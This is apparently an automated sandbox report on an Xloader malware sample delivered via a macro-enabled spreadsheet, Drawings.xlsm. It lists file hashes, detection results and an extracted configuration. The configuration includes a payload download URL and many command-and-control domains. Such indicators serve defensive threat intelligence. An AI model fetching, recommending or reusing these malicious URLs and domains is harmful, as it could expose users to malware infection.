General
-
Target
8a66b21667a04908ecafa8ac112c66588101c5e314cf32ca3b628891129635eb
-
Size
698KB
-
Sample
220208-cv1zvacbdq
-
MD5
843aa22495480166aff7bd3795f00b7c
-
SHA1
902438d24a2ebe6ec8f82df17ff0a1184d5c41ba
-
SHA256
8a66b21667a04908ecafa8ac112c66588101c5e314cf32ca3b628891129635eb
-
SHA512
ba688f743f02b83b6f7828f20ee02a9914def4783c6b36edeb40086a1c7a616d54b03a7693d3e171489f8260ac112378dc0f8b030570302c0547c6342b2feefb
Static task
static1
Behavioral task
behavioral1
Sample
Drawings.xlsm
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
Drawings.xlsm
Resource
win10v2004-en-20220112
Behavioral task
behavioral3
Sample
Drawings2.exe
Resource
win7-en-20211208
Behavioral task
behavioral4
Sample
Drawings2.exe
Resource
win10v2004-en-20220113
Malware Config
Extracted
http://cheatsheet2weightloss.com/Designs.exe
Extracted
xloader
2.3
e68n
ds3i.com
integrityconnect.info
jhpaolilo.com
aprilgraberphotography.com
globe-gist.com
blackwellheatingandcooling.com
gossgoddard.com
memoriesmade-l.com
ozsmiwd.icu
pelzerforcongress.com
infinitybytg.com
gczp22.com
logonanet.com
998899sj.com
xn--vhqqb859burbuz7jebh.com
savorysinsation.com
cumykuf.icu
ourbella.com
isurfkarma.com
thepostmail.com
charlotteexplorer.com
shopbutterfleye.com
aceitesesencialesenparaiso.com
threebearstoronto.com
survivalmistakes.com
tshirtuae.com
taimaibio.com
johnhyr.com
anthony7ap.com
meitubi.com
greencoresolutionsinc.com
j3tsurf.com
webcurepromail.online
unexpectedbeer.com
altempower.com
runitupsocks.com
polishedwithashley.com
sapanyc.com
360vacance.com
whitneywilliamsestates.com
lianhekeji.net
infinitecontent.space
nplbtc.com
startupo.xyz
strokes.guru
xx2vvs3bs.site
alwaysthomas.com
sd581.com
siamhills.com
innne.com
thelocochef.com
inspirograph.com
drluisarevalo.com
1band1sound.com
chaing-list.xyz
laohuaji.club
ldschool.net
daveropp.com
youkut.com
ketamineinfusionutah.com
fr-contacts.com
theshopifree.com
vibrabogota.com
nolanaamber.com
primeviewm.com
Targets
-
-
Target
Drawings.xlsm
-
Size
147KB
-
MD5
78a966dd22bc2e85d2f807e2575ea471
-
SHA1
7daac212c4080fc4c6abc01f515c7548be710d54
-
SHA256
a2e56ee7abc330ee99d988aee0c118f06003cd7062c3a68bedec7faa59f41f55
-
SHA512
d945df1e709e95253a58242ac5b85f2b260c03f005aa1fbc97c01699bac33d5b87190c25ebed57bb2870b0ec91e8e09437d5a7f3e7aa2621e670856e7b07bd2c
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
-
-
Target
Drawings2.exe
-
Size
885KB
-
MD5
e8fa281769eebdc238ff7996041239a8
-
SHA1
603e4ccf3f9fb75ece2008fcfb39214fd4c43e02
-
SHA256
f0898da54ae0f11c2769f71e20969563bc58e74bb1594869108b8242a9c2419b
-
SHA512
74fc4926649b2ec0cdbab0c7e8c3c7c59fc75a4a820d9309b5358aee040c891a0e2c2ac5ceb3109eee2e4a9a0ca3dfa4d62f48746973e089595c1d08a782bfef
-
CustAttr .NET packer
Detects CustAttr .NET packer in memory.
-
Xloader Payload
-
Deletes itself
-
Suspicious use of SetThreadContext
-